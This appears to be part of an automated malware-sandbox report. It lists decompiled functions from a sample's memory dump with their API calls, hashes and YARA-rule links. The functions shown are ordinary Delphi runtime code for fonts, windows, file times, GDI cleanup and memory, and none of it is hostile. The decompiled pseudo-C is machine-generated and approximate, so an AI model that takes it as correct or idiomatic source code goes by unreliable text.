                                                                                • Instruction Fuzzy Hash: B711A7713001015BC611A67A8841B7BA38D9F4534AF08462AFA54DB343DB2DDC19976E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00421FDC, Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00421FDC(int __eax, intOrPtr __ecx, void* __edx) {
				struct tagRECT _v32;
				int _t11;
				void* _t21;
				void* _t23;
				int _t26;
				void* _t30;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t36;

				_t11 = __eax;
				_v32.bottom = __ecx;
				_t30 = __edx;
				_t26 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
					_t33 =  *((intOrPtr*)( *__eax + 0x24))();
					_t36 = 0;
					if(_t33 != 0) {
						_push(0xffffffff);
						_push(_t33);
						_t23 = E0041FDC4(__edx);
						_push(_t23);
						L00406BD0();
						_t36 = _t23;
						_push(E0041FDC4(_t30));
						L00406BA0();
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t32 = _t30;
					_t35 = _t33;
					_v32.right = _v32.right - 1;
					_v32.bottom = _v32.bottom - 1;
					_t11 = PlayEnhMetaFile(E0041FDC4(_t32),  *( *((intOrPtr*)(_t26 + 0x28)) + 8),  &_v32);
					if(_t35 != 0) {
						_push(0xffffffff);
						_push(_t36);
						_t21 = E0041FDC4(_t32);
						_push(_t21);
						L00406BD0();
						return _t21;
					}
				}
				return _t11;
			}













                                                                                0x00421fdc
                                                                                0x00421fe3
                                                                                0x00421fe6
                                                                                0x00421fe8
                                                                                0x00421fee
                                                                                0x00421ff7
                                                                                0x00421ff9
                                                                                0x00421ffd
                                                                                0x00421fff
                                                                                0x00422001
                                                                                0x00422004
                                                                                0x00422009
                                                                                0x0042200a
                                                                                0x0042200f
                                                                                0x00422018
                                                                                0x00422019
                                                                                0x00422019
                                                                                0x00422029
                                                                                0x0042202a
                                                                                0x0042202b
                                                                                0x0042202c
                                                                                0x0042202d
                                                                                0x0042202e
                                                                                0x0042202f
                                                                                0x00422033
                                                                                0x0042204b
                                                                                0x00422052
                                                                                0x00422054
                                                                                0x00422056
                                                                                0x00422059
                                                                                0x0042205e
                                                                                0x0042205f
                                                                                0x00000000
                                                                                0x0042205f
                                                                                0x00422052
                                                                                0x0042206b

                                                                                APIs
                                                                                • 72E7B410.GDI32(00000000,00000000,000000FF), ref: 0042200A
                                                                                • 72E7B150.GDI32(00000000,00000000,00000000,000000FF), ref: 00422019
                                                                                • PlayEnhMetaFile.GDI32(00000000,?,?), ref: 0042204B
                                                                                • 72E7B410.GDI32(00000000,00000000,000000FF,00000000,?,?), ref: 0042205F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: B410$B150FileMetaPlay
                                                                                • String ID:
                                                                                • API String ID: 1962039817-0
                                                                                • Opcode ID: f15c074b92c496038122854ebc95fcd552bcea9610ee8adc800de6ad237f33db
                                                                                • Instruction ID: f4c557c1bb24d42774a62b44b8927d735ce660dfbc53d9c91e84fbf4e2c165a0
                                                                                • Opcode Fuzzy Hash: f15c074b92c496038122854ebc95fcd552bcea9610ee8adc800de6ad237f33db
                                                                                • Instruction Fuzzy Hash: 7101A5716042206BC610BA69DC449ABB3ED9F85338F05063BF919EB382D679DC45C6E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004545F8, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004545F8(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x487bfc; // 0x2291310
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00454588, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E00413FA4( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                                                                0x004545fa
                                                                                0x004545fd
                                                                                0x004545ff
                                                                                0x00454608
                                                                                0x00454615
                                                                                0x0045461e
                                                                                0x00454621
                                                                                0x0045462d
                                                                                0x00454632
                                                                                0x00454632
                                                                                0x0045463c
                                                                                0x0045464a
                                                                                0x0045464c
                                                                                0x00454659
                                                                                0x0045465b
                                                                                0x0045465b
                                                                                0x00454662
                                                                                0x00454662
                                                                                0x0045466b
                                                                                0x0045466f
                                                                                0x00454671
                                                                                0x00454685
                                                                                0x00454691
                                                                                0x00454696
                                                                                0x00454697
                                                                                0x00454671
                                                                                0x0045466f
                                                                                0x0045463c
                                                                                0x0045469c
                                                                                0x0045469c
                                                                                0x004546a6

                                                                                APIs
                                                                                • EnumWindows.USER32(00454588), ref: 0045462D
                                                                                • GetWindow.USER32(00000003,00000003), ref: 00454645
                                                                                • GetWindowLongA.USER32 ref: 00454652
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00454691
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$EnumLongWindows
                                                                                • String ID:
                                                                                • API String ID: 4191631535-0
                                                                                • Opcode ID: 54b30549b5890034c280d358ad55b6b187d1585eb2e61102c1a7ec289f303aab
                                                                                • Instruction ID: 5cb2c35cb50d504b52006ad56c3c00fd2761b840e39f3ce058a847bbcc87ac37
                                                                                • Opcode Fuzzy Hash: 54b30549b5890034c280d358ad55b6b187d1585eb2e61102c1a7ec289f303aab
                                                                                • Instruction Fuzzy Hash: C1119E70604200AFDB10AA68CC85F9673A8AB85729F15027AFD58AF2D3C3789C85CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040889C, Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040889C(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E00404588( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}








                                                                                0x0040889d
                                                                                0x004088a0
                                                                                0x004088bc
                                                                                0x004088b3
                                                                                0x00000000
                                                                                0x004088b5
                                                                                0x004088b5
                                                                                0x004088b5
                                                                                0x004088fb
                                                                                0x004088fe
                                                                                0x004088fe
                                                                                0x004088c9
                                                                                0x004088d8
                                                                                0x004088e0
                                                                                0x004088e6
                                                                                0x004088f4
                                                                                0x004088f9
                                                                                0x00000000

                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 004088AC
                                                                                • GetLastError.KERNEL32(?,?), ref: 004088B5
                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 004088C9
                                                                                • FileTimeToDosDateTime.KERNEL32 ref: 004088D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                • String ID:
                                                                                • API String ID: 2103556486-0
                                                                                • Opcode ID: faf4f9093bdd09ba35a4a8d2195ad12253dd24e254ffb0e310f1718714673121
                                                                                • Instruction ID: dd138b2cbfea1a41325b38cdf14aeadd6a2b6169d3a22f7e4d744e8d557f4554
                                                                                • Opcode Fuzzy Hash: faf4f9093bdd09ba35a4a8d2195ad12253dd24e254ffb0e310f1718714673121
                                                                                • Instruction Fuzzy Hash: 92F062B35002009FDB04FFA5C9C288733ACEB4431475084BBED05EB286EA38D51487B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453F14, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00453F14(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x487bfc; // 0x2291310
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x487c14 == 0) {
						_t2 = SetWindowsHookExA(3, E00453ED0, 0, GetCurrentThreadId());
						 *0x487c14 = _t2;
					}
					if( *0x487c10 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x487c10 = _t2;
					}
					if( *0x487c18 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00453E74, 0, 0, _t7);
						 *0x487c18 = _t2;
					}
				}
				return _t2;
			}





                                                                                0x00453f15
                                                                                0x00453f21
                                                                                0x00453f2a
                                                                                0x00453f3c
                                                                                0x00453f41
                                                                                0x00453f41
                                                                                0x00453f4d
                                                                                0x00453f57
                                                                                0x00453f5c
                                                                                0x00453f5c
                                                                                0x00453f68
                                                                                0x00453f7b
                                                                                0x00453f80
                                                                                0x00453f80
                                                                                0x00453f68
                                                                                0x00453f86

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453F2C
                                                                                • SetWindowsHookExA.USER32 ref: 00453F3C
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453F57
                                                                                • CreateThread.KERNEL32(00000000,000003E8,00453E74,00000000,00000000), ref: 00453F7B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateThread$CurrentEventHookWindows
                                                                                • String ID:
                                                                                • API String ID: 1195359707-0
                                                                                • Opcode ID: 0444d7c6d4168982272ff5612d8d20d92426553b9994da3837f237603c9db872
                                                                                • Instruction ID: e28856fd365dcb9ea9107fa12257fb98ca3ea3d1382ea9896caf25c5995a26e3
                                                                                • Opcode Fuzzy Hash: 0444d7c6d4168982272ff5612d8d20d92426553b9994da3837f237603c9db872
                                                                                • Instruction Fuzzy Hash: F6F03071B8D300AEF7106B659D57F1A25A4A310B97F201C7EF6046A1D2C7B85AC487AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423690, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E00423690(void* __eflags) {
				intOrPtr _t13;
				intOrPtr _t19;
				void* _t20;

				DeleteObject( *(_t20 - 0x10));
				E00403DA8();
				E00403DFC();
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4236e1);
				DeleteDC( *(_t20 - 0x1c));
				_t13 =  *((intOrPtr*)(_t20 - 0x18));
				_push(_t13);
				_push(0);
				L00407080();
				if( *(_t20 - 0x10) != 0) {
					return GetObjectA( *(_t20 - 0x10), 0x54,  *(_t20 + 0xc));
				}
				return _t13;
			}






                                                                                0x00423694
                                                                                0x00423699
                                                                                0x0042369e
                                                                                0x004236a5
                                                                                0x004236a8
                                                                                0x004236ab
                                                                                0x004236b4
                                                                                0x004236b9
                                                                                0x004236bc
                                                                                0x004236bd
                                                                                0x004236bf
                                                                                0x004236c8
                                                                                0x00000000
                                                                                0x004236d4
                                                                                0x004236d9

                                                                                APIs
                                                                                • DeleteObject.GDI32(?), ref: 00423694
                                                                                • DeleteDC.GDI32(?), ref: 004236B4
                                                                                • 72E7B380.USER32(00000000,?,?,004236E1), ref: 004236BF
                                                                                • GetObjectA.GDI32(?,00000054,?), ref: 004236D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DeleteObject$B380
                                                                                • String ID:
                                                                                • API String ID: 2559486108-0
                                                                                • Opcode ID: ac684a19cf7d03bdfc4d5038e7ab89f884e0849e1027b05f98d6bf5ae10dfc53
                                                                                • Instruction ID: 3429551c4f657d278ba83dca6c20dc1383fca88764dbb818c78fe85dd7b7e0e0
                                                                                • Opcode Fuzzy Hash: ac684a19cf7d03bdfc4d5038e7ab89f884e0849e1027b05f98d6bf5ae10dfc53
                                                                                • Instruction Fuzzy Hash: 68E03071B04215AAEB14FBE9D842B7E77BCEF44305F50482AB510E61C1C63CA9108B28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407220, Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407220(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                                                                0x00407223
                                                                                0x0040722a
                                                                                0x0040722f
                                                                                0x00407235
                                                                                0x0040723a

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$AllocHandleWire
                                                                                • String ID:
                                                                                • API String ID: 2210401237-0
                                                                                • Opcode ID: b242d88203f85b8996b776b6ff7dd028c4c5f6cd2c22e953581b3ac5f44f8ee0
                                                                                • Instruction ID: 1a6e8ccd0a1480b6cc6632480fba39d70e8d35f598ec30b1080dd49c18280503
                                                                                • Opcode Fuzzy Hash: b242d88203f85b8996b776b6ff7dd028c4c5f6cd2c22e953581b3ac5f44f8ee0
                                                                                • Instruction Fuzzy Hash: 0EB009D489030439E80433B64E4FE3B002C989070978249BE3442F2882D87CA860803D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041EB60, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E0041EB60(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41ece9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041ECF0);
					return E00404344( &_v80, 3);
				} else {
					_t76 =  *0x487a74; // 0x2290ad8
					E0041DEE4(_t76);
					_push(_t137);
					_push(0x41ecc1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E0040457C( &_v72, _v8 + 0x1b);
						if(E00408594(_v72, "Default") != 0) {
							E0040457C( &_v80, _v8 + 0x1b);
							E00408BD8( &(_v68.lfFaceName), _v80);
						} else {
							E0040457C( &_v76, "\rMS Sans Serif");
							E00408BD8( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041EE44(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41ecc8);
					_t81 =  *0x487a74; // 0x2290ad8
					return E0041DEF0(_t81);
				}
			}
















                                                                                0x0041eb61
                                                                                0x0041eb63
                                                                                0x0041eb69
                                                                                0x0041eb6c
                                                                                0x0041eb6f
                                                                                0x0041eb72
                                                                                0x0041eb76
                                                                                0x0041eb77
                                                                                0x0041eb7c
                                                                                0x0041eb7f
                                                                                0x0041eb85
                                                                                0x0041eb8f
                                                                                0x0041ecd3
                                                                                0x0041ecd6
                                                                                0x0041ece8
                                                                                0x0041eb95
                                                                                0x0041eb95
                                                                                0x0041eb9a
                                                                                0x0041eba1
                                                                                0x0041eba2
                                                                                0x0041eba7
                                                                                0x0041ebaa
                                                                                0x0041ebb4
                                                                                0x0041ebc0
                                                                                0x0041ebc5
                                                                                0x0041ebca
                                                                                0x0041ebcf
                                                                                0x0041ebd9
                                                                                0x0041ebe4
                                                                                0x0041ebdb
                                                                                0x0041ebdb
                                                                                0x0041ebdb
                                                                                0x0041ebf5
                                                                                0x0041ec02
                                                                                0x0041ec0f
                                                                                0x0041ec18
                                                                                0x0041ec24
                                                                                0x0041ec38
                                                                                0x0041ec5d
                                                                                0x0041ec68
                                                                                0x0041ec3a
                                                                                0x0041ec42
                                                                                0x0041ec4d
                                                                                0x0041ec4d
                                                                                0x0041ec6d
                                                                                0x0041ec71
                                                                                0x0041ec75
                                                                                0x0041ec80
                                                                                0x0041ec82
                                                                                0x0041ec8a
                                                                                0x0041ec84
                                                                                0x0041ec86
                                                                                0x0041ec90
                                                                                0x0041ec88
                                                                                0x0041ec96
                                                                                0x0041ec96
                                                                                0x0041ec86
                                                                                0x0041eca6
                                                                                0x0041eca6
                                                                                0x0041ecab
                                                                                0x0041ecae
                                                                                0x0041ecb1
                                                                                0x0041ecb6
                                                                                0x0041ecc0
                                                                                0x0041ecc0

                                                                                APIs
                                                                                  • Part of subcall function 0041DEE4: RtlEnterCriticalSection.KERNEL32(?,0041DF21), ref: 0041DEE8
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0041EC9E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateCriticalEnterFontIndirectSection
                                                                                • String ID: MS Sans Serif$Default
                                                                                • API String ID: 2931345757-2137701257
                                                                                • Opcode ID: 003712182c8eaff7deaab1224c24189ed19d4a75f6a5e48ecdcb400a55ac035d
                                                                                • Instruction ID: e60251e722a7b7db74474c537270072edb21ad5dc5872d212219de67613c1dc8
                                                                                • Opcode Fuzzy Hash: 003712182c8eaff7deaab1224c24189ed19d4a75f6a5e48ecdcb400a55ac035d
                                                                                • Instruction Fuzzy Hash: D1516474A04248DFDB01CFA9C981BCDBBF5EF48304F6544AAE800A7352E3389E45DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A4C4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E0040A4C4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40a67f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x486c64; // 0x40751c
					E00406520(_t52,  &_v8);
				} else {
					_t86 =  *0x486dd4; // 0x407514
					E00406520(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x486d30; // 0x4074bc
					E00406520(_t60,  &_v372);
					E0040A0EC(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00404588( &_v340, 0x105,  &_v297);
					E00408A10(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x486cdc; // 0x40756c
					E00406520(_t82,  &_v344);
					E0040A0EC(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040A686);
				E00404320( &_v372);
				E00404344( &_v344, 3);
				return E00404320( &_v8);
			}

































                                                                                0x0040a4c4
                                                                                0x0040a4d1
                                                                                0x0040a4d7
                                                                                0x0040a4dd
                                                                                0x0040a4e3
                                                                                0x0040a4e9
                                                                                0x0040a4ee
                                                                                0x0040a4ef
                                                                                0x0040a4f4
                                                                                0x0040a4f7
                                                                                0x0040a4fd
                                                                                0x0040a504
                                                                                0x0040a518
                                                                                0x0040a51d
                                                                                0x0040a506
                                                                                0x0040a509
                                                                                0x0040a50e
                                                                                0x0040a50e
                                                                                0x0040a522
                                                                                0x0040a52f
                                                                                0x0040a53b
                                                                                0x0040a5f7
                                                                                0x0040a5fd
                                                                                0x0040a607
                                                                                0x0040a60d
                                                                                0x0040a614
                                                                                0x0040a61a
                                                                                0x0040a630
                                                                                0x0040a635
                                                                                0x0040a647
                                                                                0x0040a55e
                                                                                0x0040a561
                                                                                0x0040a567
                                                                                0x0040a57f
                                                                                0x0040a590
                                                                                0x0040a59b
                                                                                0x0040a5a1
                                                                                0x0040a5ab
                                                                                0x0040a5b1
                                                                                0x0040a5b8
                                                                                0x0040a5be
                                                                                0x0040a5d4
                                                                                0x0040a5d9
                                                                                0x0040a5eb
                                                                                0x0040a5f0
                                                                                0x0040a650
                                                                                0x0040a653
                                                                                0x0040a656
                                                                                0x0040a661
                                                                                0x0040a671
                                                                                0x0040a67e

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A67F), ref: 0040A52F
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A67F), ref: 0040A551
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
